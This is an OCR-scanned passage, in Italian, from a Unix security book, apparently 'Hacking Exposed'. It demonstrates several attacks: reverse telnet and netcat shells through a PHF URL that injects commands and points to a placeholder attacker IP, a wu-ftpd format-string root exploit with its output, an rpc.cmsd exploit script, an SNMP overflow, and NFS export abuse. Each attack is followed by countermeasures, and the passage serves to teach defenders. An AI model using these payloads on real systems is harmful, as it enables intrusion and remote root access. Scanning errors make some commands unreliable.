guire i comandi seguenti in due diverse sessioni, per poter ricevere e attivare con 
successo le connessioni telnet inverse: 


[tsunami]# nce -1 -n -v -p 80 
listening on [any] 80 


[tsunami]# nc -1 -n -v -p 25 
listening on [any] 25 


Assicuratevi che nessun altro servizio, come HTTPD o sendmail, sia in ascolto sulle 
porte 80 e 25. Se è già attivo un servizio, questo dev'essere disattivato con il coman- 
do kill, in modo che ne possa collegarsi con successo alle stesse porte. I due co- 
mandi nc attivano l'ascolto sulle porte 25 e 80 attraverso i parametri -1 e -p, il para- 
metro -v attiva la modalità verbose, ossia con l'emissione di descrizioni complete, 
mentre il parametro -n impedisce la risoluzione di indirizzi IP in nomi host. 
Procedendo nel nostro esempio, possiamo attivare una sessione di telnet inverso, 
utilizzando il punto debole già trovato in PHF, per avviare il comando telnet sul 
server Web. Questo è il comando che è possibile avviare sul server: 


/bin/telnet evil hackers_IP 80 | /bin/sh | /bin/telnet evil hackers_IP 25 


Questa è la stringa completa che può essere eseguita attraverso l'attacco su PHF: 


/egi-bin/phf?Qalias=x%0a/bin/telnet%20evil hackers_IP 
%2080%20|%20/bin/sh%20|%20/bin/telnet%20evil hackers_IP%2025 


Forniamo una spiegazione per questa stringa, all'apparenza complessa. /bin/tel- 
net evil _hackers_IP 809 esegue la connessione al programma ne in ascolto sulla 
porta 80: questo è il punto esatto in cui eseguiremo i comandi. Per rimanere in linea 
con i normali meccanismi di input/output UNIX, l’output standard e le pressioni di 
tasti sono trasferiti a /bin/sh, la shell Bourne; i risultati dei nostri comandi vengono 
inviati a /bin/telnet evil hackers_IP 25. Lo scopo finale consiste in una sessio- 
ne di telnet inverso che viene attivata in due diverse finestre. In questo esempio 
sono state selezionate le porte 80 e 25, perché su queste sono attivi servizi che in 
genere non vengono filtrati dalla maggior parte dei firewall. Potrebbero comunque 
essere selezionate due porte qualsiasi, considerando che il traffico in uscita dalla 
rete verso queste due porte deve essere consentito dal firewall. 

Un altro metodo per creare un canale di comunicazione di ritorno consiste nell’uti- 
lizzare direttamente nce al posto di telnet, se l'eseguibile nc è già disponibile sul 
server, 0 può essere memorizzato in qualche modo (per esempio attraverso una 
sessione FTP anonima). Come abbiamo già affermato diverse volte, nc è uno dei 
migliori programmi di utilità disponibili, per cui non deve sorprendere molto il fatto 
che sia parte dell’installazione predefinita di molte distribuzioni freeware di UNIX: 
le probabilità di trovarlo disponibile su un dato sistema target sono via via sempre 
maggiori. D'altra parte, anche se nc è disponibile nel sistema da attaccare, non c'è 
alcuna garanzia che l'eseguibile sia stato compilato con l'opzione attiva #define 
GAPING_SECURITY_HOLE, necessaria per creare sessioni di comunicazione inversa 
attraverso il parametro -e. Nel nostro esempio supporremo che sul sistema target 
sia disponibile una versione di nc, con l'opzione menzionata poco sopra attivata. 
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Anche la creazione di un canale di ritorno con nce deve prevedere due passaggi distin- 
ti. Dobbiamo eseguire il comando seguente, per poter ricevere il canale nc inverso: 


[tsunami]# nc -1 -n -v -p 80 


Una volta abilitata la sessione in ascolto, è necessario eseguire il seguente comando 
sul sistema remoto: 


nc -e /bin/sh evil hackers_IP 80 


Questa è la stringa completa che può essere eseguita attraverso l'attacco su PHF: 


/egi-bin/phf?Qalias=x%®a/bin/nc%20-e%20/bin/sh%20evil hackers_IP%2080 


Quando il server Web ha eseguito la stringa riportata viene attivato un canale di ri- 
torno che si occupa di restituire una shell, in questo caso /bin/sh, alla sessione in 
ascolto: ciò consente l’accesso istantaneo alla shell del sistema remoto, il tutto attra- 
verso una connessione originata dal server target. 


D) 


Contromisure ai canali di ritorno 


È molto difficile riuscire a proteggersi con efficacia dagli attacchi di connessione in- 
versa. Il consiglio migliore consiste nella prevenzione: mantenete i requisiti di sicu- 
rezza del sistema molto elevati, in modo da evitare la possibilità di attacchi di que- 
sto tipo. Disabilitate i servizi non necessari e applicate tutte le patch fornite dal pro- 
duttore del vostro sistema UNIX e degli applicativi che utilizzate. 
Potete anche mettere in pratica i seguenti consigli. 
e Rimuovete il server X da qualunque sistema che richieda un elevato livello 
di sicurezza. Questa è un’ottima azione preventiva, che impedisce agli hac- 
ker di lanciare sessioni “inverse” di xterm, ed evita i rischi legati al fatto che 
utenti locali desiderosi di tentare la scalata all'utente root utilizzino punti 
deboli dei file binari del pacchetto X. 


e Seilserver Web è attivo con le autorizzazioni dell’utente “nobody”, modifi- 
cate i permessi di accesso ai file binari come telnet, in modo da impedire 
l'esecuzione del file a chiunque non ne sia proprietario o non faccia parte 
di gruppi specifici (per esempio, chmod 750 telnet). In questo modo vi as- 
sicurerete che solamente gli utenti autorizzati saranno in grado di eseguire 
telnet, impedendone l'esecuzione agli utenti che non dovrebbero mai uti- 
lizzare questo programma. 


e Inalcuni casi è possibile configurare il firewall per impedire le connessioni 
originate dal server Web o dai sistemi interni. Questo può essere utile, spe- 
cialmente se esso svolge anche le funzioni di server proxy. Potrebbe essere 
molto più difficile, anche se non impossibile, avviare una connessione in- 
versa in uscita da un firewall proxy, se richiede una qualche forma di auten- 
ticazione dell'utente. 


Metodi comuni di attacco remoto 


Anche se non siamo in grado di trattare tutti i metodi conosciuti per l'attacco remoto 
a un server UNIX, a questo punto dovreste avere un'idea ben chiara della modalità 
che viene impiegata per portare a termine la maggior parte delle intrusioni. Voglia- 
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mo ora esporre una casistica dei servizi che vengono attaccati con maggiore fre- 
quenza, cercando nel contempo di fornire specifiche contromisure per ridurre sen- 
sibilmente il rischio di intrusione. 


1, FTP 
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FTP (File Transfer Protocol) è uno dei protocolli maggiormente utilizzati, che con- 
sente di eseguire l’upload e il download di file tra sistemi remoti. FTP è spesso uti- 
lizzato per ottenere l’accesso a un sistema remoto, o per memorizzare e conservare 
abusivamente file illegali. Molti server FTP consentono l’accesso anonimo, abilitan- 
do chiunque ad accedere al server senza necessità di autenticazione. Generalmente 
un utente FTP ha l’accesso a una particolare sezione dell'albero delle directory; in 
questa situazione, invece, è possibile per un utente anonimo di un server FTP acce- 
dere all'intera struttura delle directory: in questo modo un hacker potrebbe ottenere 
con facilità i delicati file di configurazione del sistema, come per esempio 
letc/passwd. Per rendere ancora più complicato il quadro, molti server FTP metto- 
no a disposizione directory sulle quali chiunque ha l’accesso in scrittura: questo è 
indice quasi sicuro dell’approssimarsi di un incidente dovuto all’intrusione di qual- 
che hacker. Un hacker potrebbe essere in grado di posizionare un file . rhosts nel- 
la directory home di qualche utente, il che gli consente di eseguire il comando rlo- 
gin per la connessione remota al sistema. Abbiamo già detto che moltissimi server 
FTP vengono utilizzati da utenti di ogni tipo, anche per conservare software pirata 
all’interno di directory nascoste. Se il vostro traffico di rete triplica nel giro di uno 0 
due giorni, potete essere sicuri che lo spazio su disco viene utilizzato per ospitare e 
distribuire gli ultimi programmi “warez”. 

In aggiunta a questi rischi, associati all'accesso anonimo, i server FTP ne presentano 
anche altri, dovuti a possibili condizioni di buffer overflow e a ulteriori punti vulnera- 
bili. Uno degli ultimi punti deboli dei server FTP è stato scoperto nei sistemi che uti- 
lizzano le versioni wu-ftpd 2.6.0 e precedenti (ftp://ftp.auscert.org.au/ 
pub/auscert/advisory/AA-2000.02). La vulnerabilità “site exec” è collegata alla non 
corretta validazione degli argomenti di diverse funzioni che implementano la funzio- 
nalità “site exec”, che consente agli utenti connessi a un server FTP di eseguire un in- 
sieme di comandi limitato. Tuttavia, è possibile, per un hacker, passare caratteri spe- 
ciali, costituiti da caratteri ottenuti per conversione da printf() (&f, %p, %n e così via) 
utilizzati per eseguire un codice arbitrario come utente root. Diamo un’occhiata a un 
attacco di questo tipo lanciato contro un sistema RedHat 6.2 “di serie”: 


[thunder]# wugod -t 192.168.1.10 -s0 

Target: 192.168.1.10 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 
2.6.0(1) from rpm 

Return Address: 09x08075844, AddrRetAddr: @Oxbfffb028, Shellcode: 152 
loggin into system.. 

USER ftp 

331 Guest login ok, send your complete e-mail address as password. 
PASS <shellcode> 

230-Next time please use your e-mail address as your password 
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230 - for example: joe@thunder 

230 Guest login ok, access restrictions apply. 

STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04] 
STEP 3 : Checking if we can reach our return address by format string 
STEP 4 : Ptr address test: @xbfffb028 (if it is not @xbfffb®28 *C me now) 
STEP 5 : Sending code.. this will take about 10 seconds. 

Press “\ to leave shell 

Linux shadow 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown 
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) 


Come dimostrato in precedenza, questo attacco è letale. L'accesso anonimo a un 
server FTP vulnerabile che supporta “site exec” apre la strada all'accesso come root. 
Altre falle nella sicurezza delle versioni ftpd di derivazione BSD antecedenti al 1993 
possono essere trovate all'indirizzo http://ww.cert.org/advisories/CA-2000 - 
13.html. Questi punti deboli non vengono trattati dettagliatamente, ma sono altret- 
tanto devastanti. 


@ 
© Contromisure per FTP 


Sebbene il servizio FTP sia molto utile, la scelta di autorizzare l’accesso anoni- 
mo può essere abbastanza rischiosa per la sicurezza del server. Valutate attenta- 
mente la necessità di attivare il servizio FTP e soprattutto se consentire l’accesso 
all’utente anonimo. Molti siti devono consentire l’accesso anonimo via FTP; tut- 
tavia considerate attentamente l’importanza di assicurare la sicurezza del server. 
Applicate tutte le patch dei fornitori del sistema e dei servizi, e soprattutto elimi- 
nate o riducete il più possibile il numero di directory per le quali è autorizzata la 
scrittura. 


CD) sendmail 
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Da dove possiamo cominciare? sendmail è l'agente per il trasferimento della posta 
elettronica (MTA), utilizzato da moltissimi sistemi UNIX. sendmail è anche uno dei 
programmi più “vulnerabili” presenti in UNIX. È un programma estendibile, molto 
configurabile e decisamente complesso. I malfunzionamenti di sendmail sono di- 
ventati di pubblico dominio nel 1988 e, da allora, sono stati utilizzati per ottenere 
l'accesso a centinaia di sistemi. In quel periodo ci si chiedeva “Qual è il baco di 
questa settimana?”. Durante gli ultimi anni il programma sendmail è stato molto mi- 
gliorato, anche nelle caratteristiche di sicurezza, ed oggi è costituito da più di 80.000 
righe di codice: esistono perciò ancora buone probabilità di trovare altri punti vul- 
nerabili. 

Riprendendo quanto abbiamo visto nel Capitolo 3, sendmail può essere utilizzato 
per identificare i nomi utente mediante i comandi vrfy ed expn. La possibilità di ot- 
tenere l'elenco degli utenti definiti nel sistema è di per sé abbastanza pericolosa, ma 
non espone al rischio di un vero e proprio attacco, cosa che invece è possibile sfrut- 
tando altri punti deboli di sendmail. Sono state registrate numerose vulnerabilità di 
sendmail, negli ultimi dieci anni, e altre ancora ne verranno individuate. Sono stati 
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individuati molti punti vulnerabili ad attacchi relativi a condizioni di buffer overflow 
e di validazione dell’input. 


D Contromisure per sendmail 


La migliore difesa contro gli attacchi a sendmail consiste nella disattivazione del 
servizio, sempre che non abbiate necessità di ricevere posta elettronica dalla rete. 
Se per la vostra architettura di rete è necessario, invece, attivare il servizio send- 
mail, assicuratevi di utilizzare l’ultima versione disponibile, applicando tutti gli ag- 
giornamenti pubblicati (solitamente disponibili al sito ww.sendmail.org). Potete 
attivare altre misure di sicurezza, rimuovendo gli alias dagli appositi file, dal mo- 
mento che questa funzionalità si è dimostrata essere una falla nella sicurezza del 
programma. Rintracciate tutti gli alias che puntano a programmi, invece che a nomi 
utente, e assicuratevi che le loro autorizzazioni siano tali da non permettere agli 
utenti di apportare modifiche. 

Potete anche utilizzare programmi di utilità addizionali, in grado di aumentare la si- 
curezza di sendmail. smap e smapd vengono distribuiti con il toolkit TIS e sono libe- 
ramente disponibili al sito http://ww.tis.com/research/software/. smap viene 
utilizzato per accettare messaggi dalla rete in modalità sicura: i messaggi vengono 
poi memorizzati in una particolare directory, che costituisce una coda messaggi. 
smapd controlla periodicamente questa directory e distribuisce i messaggi ai rispetti- 
vi utenti, utilizzando sendmail o qualche altro programma. 

Questo meccanismo scardina la possibilità di connessione diretta tra sendmail e 
ogni utente non autenticato, poiché tutte le connessioni di posta transitano attraver- 
so smap, piuttosto che passare direttamente da sendmail. Per concludere, conside- 
rate la possibilità di utilizzare altri servizi di posta intrinsecamente più sicuri, come 
gmail o postfix. qmail rappresenta il più moderno sostituto di sendmail ed è sta- 
to scritto da Dan Bernstein. Uno dei principi su cui è stato progettato è appunto la 
sicurezza, e fino ad ora non ha smentito questa reputazione (consultate il sito 
www.qmail.org). Anche postfix, scritto da Wietse Venema, è un sostituto più sicu- 
ro di sendmail (consultate il sito http://ww.postfix.com/). 

In aggiunta agli argomenti appena menzionati, spesso sendmail viene configurato 
in modo errato, consentendo la ritrasmissione di pubblicità attraverso il vostro servi- 
zio. Nelle versioni di sendmail a partire dalla 8.9, è stata abilitata come impostazio- 
ne predefinita una funzionalità che impedisce la ritrasmissione. Per ulteriori infor- 
mazioni, vi rimandiamo a http://www.sendmail.org/tips/relaying.html. 


® Servizi RPC (Remote Procedure Call) 
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Impatto: 10 
Fattore di rischio: 9 


RPC (Remote Procedure Call, invocazione remota di procedure) è un servizio che 
consente a un programma attivo su un certo computer di avviare il codice in un si- 
stema remoto. 

Una delle prime implementazioni di RPC è stata sviluppata da Sun Microsystems e si 
serviva di un sistema chiamato “rappresentazione esterna dei dati" (XDR). Questa 
implementazione è stata progettata per dialogare con NIS (Network Information Sy- 
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stem di Sun) e con NFS (Network File System). Dopo che Sun Microsystem ha pub- 
blicato questa implementazione di servizi RPC, molti produttori di sistemi UNIX 
l'hanno adottata: la scelta dello standard RPC rappresenta una buona funzionalità 
per consentire l’interoperabilità tra sistemi diversi. Quando è stata pubblicata la pri- 
ma versione dei servizi RPC, erano previsti ben pochi dispositivi di sicurezza. Sun, 
insieme ad altri produttori, ha rilasciato numerose patch per migliorare progressiva- 
mente la sicurezza di tutti i sistemi già installati, ma nonostante questi sforzi RPC 
soffre ancora per numerosi problemi. 

Come già detto nel Capitolo 3, i servizi RPC si registrano sul portmapper, quando 
vengono avviati. Per comunicare con un servizio RPC è necessario interrogare il port- 
mapper e determinare su quale porta è in ascolto il servizio richiesto. Abbiamo anche 
visto come ottenere un elenco di servizi RPC attivi, utilizzando rpcinfo, oppure con 
l'opzione -n se i servizi del portmapper risiedono su un firewall. Sfortunatamente, 
moltissimi sistemi UNIX attivano in modalità automatica diversi servizi RPC, all’avvio 
del server. Per complicare le cose, si aggiunga che molti servizi RPC sono di estrema 
complessità e sono attivi con i privilegi dell'utente root. Un attacco portato a termine 
con successo, tramite l'esecuzione di buffer overflow o di validazione dell'input, por- 
ta direttamente all’accesso diretto dell'utente root. Le notizie più recenti relative agli 
attacchi di tipo buffer overflow a RPC più gravi riguardano rpc.ttdbserverd e 
rpc.cmsd, e si trovano agli indirizzi http://Ww.cert.org/advisories/CA-98.11. 
tooltalk.html, http://ww.cert.org/advisories/CA-2002-26.html e http:// 
ww.Ccert.org/advisories/CA-99-08-cmsd.html: entrambi questi servizi RPC fan- 
no parte della piattaforma CDE (Common Desktop Environment). Dal momento che 
questi due servizi sono attivi con le autorizzazioni dell'utente root, l'hacker deve so- 
lamente sfruttare la condizione di buffer overflow per costringere il server ad avviare 
una sessione xterm o attivare un'istanza di telnet inverso e il gioco è fatto. Altri servi- 
zi RPC che espongono a pericoli sono rpe.statd (vedere http://ww.cert.org/ 
advisories/CA-99-05-statd-automountd.html) e mountd, che sono attivi quando 
viene abilitato NFS (si veda il paragrafo “NFS”). Anche se il portmapper viene blocca- 
to, l'hacker è comunque in grado di effettuare la scansione manuale alla ricerca di 
servizi RPC (mediante l’opzione - sR di nmap), che di solito sono attivi alle porte con 
numerazione più elevata. I servizi finora menzionati sono soltanto un piccolo esem- 
pio di tutti i servizi RPC che potrebbero provocare problemi di sicurezza. A causa 
della natura distribuita delle funzionalità RPC, la situazione è in costante evoluzione, 
dal punto di vista sia degli attacchi sia delle difese, come mostrato di seguito: 


[rumble]# cmsd.sh quake 192.168.1.11 2 192.168.1.103 
Executing exploit... 


rtable_create worked 
clnt_call[rtable insert]: RPC: Unable to receive; errno = Connection reset 
by peer 


Per semplificare questo attacco, è sufficiente un semplice script di shell che invoca 
l'attacco cmsd, come mostrato di seguito. 

È necessario conoscere il nome del sistema, nel nostro caso “quake”. Vengono for- 
niti: l'indirizzo IP di destinazione di “quake”, che è 192.168.1.11, e il tipo di sistema 
(2), corrispondente a Solaris 2.6. Questo aspetto è critico, perché l’expolit è ritaglia- 
to per il singolo sistema operativo. Infine, viene fornito l'indirizzo IP del sistema 
dell’hacker (192.168.1.103) e inviato in risposta xterm (Figura 7.2): 


#1/bin/sh 
if [ S$# -1t 4 ]; then 
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echo "Rpc.cmsd buffer overflow for Solaris 2.5 & 2.6 7" 

echo "If rpcinfo -p target_ip |grep 100068 = true - you win!" 

echo "Don't forget to xhost+ the target system" 

echo "" 

echo "Usage: $0 target _hostname target _ip </ version (1-7)> your_ip" 
exit 1 

ti 


echo "Executing exploit..." 
cmsd -h $1 -c "/usr/openwin/bin/xterm -display $4:0.0 &" $3 $2 


# uname -a 

Sun0S quake 5,6 Generic sundm sparc SUNÒW,.SPARCstation-20 
# id 

uid=0{root) gid=0{root} 

# D 


Figura 7.2 
xterm è il risultato dell'attacco di rpc.cmsd. Si otterrebbe lo stesso risultato se un hacker eseguisse 
l'attacco di rpc.ttdbserverd o rpc.stadt da una postazione remota, 


Contromisure agli attacchi a RPC 


La migliore difesa contro gli attacchi a RPC consiste nella disattivazione di tutti i ser- 
vizi non assolutamente necessari. Se un servizio RPC è critico per la funzionalità del 
server, considerate la possibilità di implementare un dispositivo di controllo d’ac- 
cesso che dia solamente agli utenti autorizzati la possibilità di interrogare le relative 
porte: in funzione dell’architettura della rete, questa soluzione potrebbe essere però 
di difficile fattibilità. 

Considerate l'opportunità di abilitare l'esecuzione dello stack, solo se il sistema 
operativo lo permette e, inoltre, valutate la possibilità di impiegare Secure RPC, se è 
supportato dalla versione di UNIX che utilizzate: esso tenta di fornire un livello di 
autenticazione aggiuntivo, basato sulla crittografia a chiave asimmetrica pubbli- 
ca/privata. Secure RPC non è comunque la soluzione di tutti i problemi, visto che 
molti produttori di sistemi UNIX non hanno adottato questo protocollo: vengono 
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infatti meno i requisiti di interoperabilità, che sono la caratteristica fondamentale di 
RPC. Per ultimo, consigliamo ancora una volta di accertarvi di aver applicato tutti gli 
aggiornamenti proposti dal vostro fornitore. Le informazioni per ognuno dei tipi di 
vulnerabilità presentati sono disponibili agli indirizzi elencati di seguito: 
e rpc.ttdbserverd http://ww.cert.org/advisories/CA-98.11.to001- 
talk.html; 
rpc.cmsd http://ww.cert.org/advisories/CA-99-08-cmsd.html; 


rpc.statd http://ww.cert.org/advisories/CA-99-05-statd-auto- 
mountd.html; 


sadmind http://ww.cert.org/advisories/CA-20001-11.html; 
snmpXdmid http://ww.cert.org/advisories/CA-20001-05.html. 


® Buffer overflow di SNMP 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


Il protocollo SNMP (Simple Network Management Protocol) è la linfa vitale di molte 
reti ed è presente praticamente ovunque: esso permette la gestione dei dispositivi 
(come router, switch e server) sia tra diverse filiali, sia in Internet. Sfortunatamente 
SNMP non è il protocollo più sicuro che esista: peggio ancora, sono state riscontrate 
diverse vulnerabilità agli attacchi di tipo buffer overflow, su dozzine di produttori e 
su centinaia di piattaforme differenti. Molto del lavoro di ricerca per risolvere i pro- 
blemi legati a questo tipo di vulnerabilità è stato svolto dal progetto Protos dell’uni- 
versità di Oulu (http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ 
snmpv1/), che ha rilasciato una serie di suite di programmi di test per la verifica dei 
sistemi. Obiettivo primario di questo lavoro è stata l’identificazione delle vulnerabi- 
lità del protocollo SNPMvI relative alla gestione dei messaggi di trap (inviati dagli 
agenti agli amministratori) e di quelli di richiesta (inviati dagli amministratori agli 
agenti): tali punti deboli possono essere sfruttati per generare una condizione di 
Dos (Denial of Service) tale da permettere a un hacker di eseguire comandi da re- 
moto. L'esempio che segue descrive come un hacker sia in grado di compromettere 
una versione non aggiornata (quindi vulnerabile) della piattaforma OpenBSD: 


[wave] $ ./ucd-snmpd-cs 10.0.1.1 161 

$ nc 10.0.1.1 2834 

id 

uid=@(root) gid=0(root) group=@0(root) 


Come si può vedere, effettuare l’attacco di questa vulnerabilità di buffer overflow e 
ottenere l'accesso al sistema con i permessi di root è molto semplice. Se per noi è 
stato così facile approfittare di questo punto debole, potete immaginare quanto 
poco impegnativo possa essere per i malintenzionati mettere gli occhi sui dispositivi 
SNMP di questo tipo! 
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DI Contromisure al buffer overflow di SNMP 


Per limitare l'esposizione dei sistemi causata da questa vulnerabilità possono essere 
impiegate diverse contromisure. È sempre consigliabile disabilitare il protocollo 
SNMP dia tutti i dispositivi che non ne hanno una reale necessità, per individuare i 
quali si possono utilizzare programmi come SNScan (un tool freeware distribuito da 
Foundstone sul sito Web http://www. foundstone.com). Un'altra possibile contro- 
misura consiste nel mantenere aggiornati con le patch più recenti dei produttori tut- 
ti i dispositivi firmware che utilizzano una versione vulnerabile di SNMP, dei quali 
potete trovare un elenco esauriente alla pagina Web http://ww.cert.org/advi- 
sories/CA-2002-03.html. Oltre a questo, dovreste anche cambiare le stringhe di 
default relative alle password dei gruppi del protocollo SNMP, sia pubblici sia priva- 
ti. Infine è opportuno applicare ai dispositivi che utilizzano SNMP un filtraggio di 
rete che consenta l'accesso alla sola macchina dell’amministratore. La realizzazione 
di quest'ultima contromisura non è così semplice, soprattutto in contesti aziendali 
molto estesi, e potrebbe avere costi piuttosto elevati. 


® ns 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


Per citare Sun Microsystems, “il computer è la rete”; infatti, senza una connessione 
in rete, un singolo computer è infinitamente meno potente e versatile. Questo è for- 
se il motivo per cui NFS (Network File System) è uno dei più popolari e utilizzati file 
system di rete disponibili. NFS consente l’accesso trasparente a file e directory di un 
sistema remoto come se fossero presenti in locale, Le versioni 1 e 2 di NFS erano 
state sviluppate da Sun Microsystems e si sono evolute considerevolmente. Al mo- 
mento, è disponibile in versione 3, e viene utilizzato da tutte le maggiori distribuzio- 
ni di UNIX. 

A questo punto dobbiamo piantare qualche bandierina rossa per qualunque sistema 
che consenta l’accesso remoto a un file system esportato. Ci sono alte probabilità 
che si faccia abuso di NFS, e questo è confermato dal fatto che è uno dei più comu- 
ni obiettivi di attacchi a UNIX. Prima di tutto, sono state evidenziate molte condizio- 
ni di buffer overflow relative a mountd, il server NFS; inoltre, il servizio NFS si basa 
su RPC e può essere ingannato con facilità per consentire a un hacker di eseguire il 
mount di un file system remoto. 

Il segreto della sicurezza di NFS è un oggetto dati conosciuto come file bandle. Il 
file handle è una struttura dati impiegata per identificare in modo univoco ogni file 
o directory presente sul server remoto: se il file handle viene intercettato (oppure 
indovinato per tentativi), un hacker può facilmente ottenere l’accesso ad esso da 
una postazione remota. 

Il tipo di attacco a NFS più comune si basa su un’errata configurazione del servizio, 
che consente di esportare il file system al gruppo Everyone: grazie a questo, qua- 
lunque utente remoto è in grado di accedere al file system senza necessità di auten- 
ticazione. Questo tipo di attacco è più che altro dovuto alla pigrizia o alla mancanza 
di conoscenze degli amministratori di sistema, e purtroppo è molto frequente. Un 
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hacker non ha la necessità di effettuare intrusioni sul sistema remoto, in quanto è 
sufficiente eseguire il mount del file system e saccheggiarne il contenuto di proprio 
interesse. Spesso le home directory degli utenti vengono esportate in questo modo 
e moltissimi file interessanti (per esempio interi database) sono disponibili e di pub- 
blico dominio. A volte addirittura l’intera directory principale del sistema “/" viene 
prelevata con accesso libero! Prendiamo in considerazione qualche esempio e di- 
scutiamo alcuni strumenti che consentono di analizzare NFS. 

Il nostro sistema target viene analizzato per scoprire se NFS è attivo e sono stati 
esportati file system: 


[tsunami]# rpcinfo -p quake 


program vers proto port 


100000 4 tcp 111 rpcbind 
100000 3° top 111 rpcbind 
100000 2. tcp 111 rpebind 
100000 4 udp 111 rpcbind 
100000 3. udp 111 rpebind 
100000 2 udp 111 rpebind 
100235 1 tep 32771 
100068 2 udp 32772 
100068 3. udp 32772 
100068 4 udp 32772 
100068 5 udp 32772 
100024 1 udp 32773 status 
100024 1 tep 32773 Status 
100083 1 tep 32772 
100021 1 udp 4045 nlockmgr 
100021 2. udp 4045 nlockmgr 
100021 3. udp 4045 nlockmgr 
100021 4. udp 4045 nlockmgr 
100021 i tcp 4045 nlockmgr 
100021 2 tep 4045 nlockmgr 
100021 3. tcp 4045 nlockmgr 
100021 4 tcp 4045 nlockmgr 
300598 1 udp 32780 
300598 1 tcp 32775 
805306368 1 udp 32780 
805306368 1 tcp 32775 
100249 1 udp 32781 
100249 1 tcp 32776 
1342177279 4 tcp 32777 
1342177279 1 tcp 32777 
1342177279 3 tep 32777 
1342177279 2 tcp 32777 
100005 1 udp 32845 mountd 
100005 2 udp 32845 mountd 
100005 3. udp 32845 mountd 
100005 1 tcp 32811 mountd 
100005 2 tcp 32811 mountd 
100005 3. tcp 32811 mountd 
100003 2 Uudp 2049 nfs 
100003 3 udp 2049 nfs 
100227 2 udp 2049 nfs_acl 
100227 3 udp 2049 nfs _acl 
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100003 2 tcp 2049 nfs 
100003 3 tcp 2049 nfs 
100227 2 tcp 2049 nfs_acl 
100227 3 tcp 2049 nfs_acl 


Interrogando il portmapper, possiamo vedere che sono attivi i servizi mountd e nfs 
da questo possiamo concludere che c'è la possibilità che qualche file system sia sta- 
to esportato: 


[tsunami]# showmount -e quake 
Export list for quake: 

/ (everyone) 

/Jusr (everyone) 


Il risultato del comando showmount indica che le directory / e /usr sono esportabi- 
li, con accesso a chiunque: questo rappresenta un enorme rischio per la sicurezza 
del sistema. Qualunque hacker potrebbe semplicemente eseguire il comando mount 
/ oppure /usr, per aver accesso alle cartelle / e /usr, soggette alle autorizzazioni 
assegnate a ciascuna directory e file. Il comando mount è disponibile nella maggior 
parte delle distribuzioni UNIX, anche se non è versatile come altri programmi. Per 
comprendere meglio le opzioni per esso disponibili, potete utilizzare il comando 
man mount, che visualizza la pagina di manuale relativa alla versione a vostra dispo- 
sizione: 


[tsunami]# mount quake:/ /mnt 


Uno strumento più adatto per l'esplorazione di NFS è il programma di utilità nf s- 
shell scritto da Leendert van Doorn, disponibile al sito ftp://ftp.cs.vu.nl/ 
pub/leendert/nfsshell.tar.gz. Il pacchetto nfsshell contiene un potente 
client, chiamato nfs, che opera allo stesso modo di un client FTP e consente la ma- 
nipolazione remota del file system. Il comando nfs è fornito di diverse opzioni, che 
vale la pena illustrare: 


[tsunami]# nfs 

nfs> help 

host <host> - set remote host name 

uid [<uid> [<secret-key>]] - set remote user id 
gid [<gid>] - set remote group id 

cd [<path>] - change remote working directory 
led [<path>] - change local working directory 
cat <filespec> - display remote file 

ls [-1] <filespec> - list remote directory 
get <filespec> - get remote files 

df - file system information 

rm <file> - delete remote file 

ln <file1> <file2> - link file 

mv <file1> <file2> - move file 

mkdir <dir> - make remote directory 

rmdir <dir> - remove remote directory 

chmod <mode> <file> - change mode 

chown <uid>[.<gid>] <file> - change owner 
put <local-file> [<remote-file>] - put file 
mount [-upTU] [-P port] <path> - mount file system 
umount - umount remote file system 

umountall - umount all remote file systems 
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export - show all exported file systems 

dump - show all remote mounted file systems 
status - general status report 

help - this help message 

quit - its all in the name 

bye - good bye 

handle [<handle>] - get/set directory file handle 
mknod <name> [b/c major minor] [p] - make device 


Innanzitutto dobbiamo dire a nf s qual è l'host di cui vogliamo eseguire il mount: 
nfs> host quake 


Using a privileged port (1022) 
Open quake (192.168.1.10) TCP 


Possiamo ottenere un elenco dei file system esportati: 
nfs> export 
Export list for quake: 


/ everyone 
Jusr everyone 


A questo punto possiamo eseguire mount / per accedere al file system: 
nfs> mount / 


Using a privileged port (1021) 
Mount '/', TCP, transfer size 8192 bytes. 


Possiamo eseguire il controllo di stato della connessione, per determinare l’UID uti- 
lizzato per l'operazione di mount del file system: 


nfs> status 


User id tr «2 
Group id 1-2 
Remote host : 'quake’' 
Mount path “Se 


Transfer size: 8192 


Abbiamo eseguito mount su /, e i nostri UID e GID sono uguali a -2. Per motivi di si- 
curezza, se si esegue il mount di un file system remoto come root, l’UID e il GID 
sono comunque diversi da 0, In molti casi (senza l’utilizzo di speciali opzioni), è 
possibile eseguire il mount di un file system con qualunque UID e GID che non sia 
0 o root. Dal momento che abbiamo montato l’intero file system, possiamo visualiz- 
zare facilmente il contenuto del file /etc/passwd: 


nfs> cd /etc 


nfs> cat passwd 
root:x:0:1:Super-User:/:/sbin/sh 
daemon:x:1:1::/: 

bin:x:2:2::/usr/bin: 

SYSIxod:331/: 

adm:x:4:4:Admin:/var/adm: 

lp:x:71:8:Line Printer Admin:/usr/spool/1lp: 
smtp:x:0:0:Mail Daemon User:/: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
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nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico 
listen:x:37:4:Network Admin:/usr/net/nls: 

nobody :x:60001:60001:Nobody:/: 

noaccess:x:60002:60002:No Access User:/: 
nobody4:x:65534:65534:Sunos 4.x Nobody:/: 
gk:x:1001:10::/export/home/gk:/bin/sh 
Ssm:x:1003:10::/export/home/sm:/bin/sh 


La visualizzazione del file /etc/passwd consente di ottenere l'elenco dei nomi 
utente e degli user ID associati. Gli hash delle password sono contenuti nel file 
/etc/shadow, per cui non è possibile procedere con il crack delle password. Dal 
momento che questa informazione non è utile per ottenere le password e non pos- 
siamo fare il mount del file system come utente root, dobbiamo determinare quali 
altri utenti godano di accesso privilegiato. 

L'utente daemon promette bene, ma bin (UID 2) è la scelta migliore poiché in molti 
sistemi tale utente è il proprietario dei file eseguibili. Se l'hacker ottiene l’accesso ai 
file eseguibili via NFS o in altro modo, la maggior parte dei sistemi può ritenersi bat- 
tuta. Tentiamo di applicare il mount alla directory /usr, e di modificare i nostri UID 
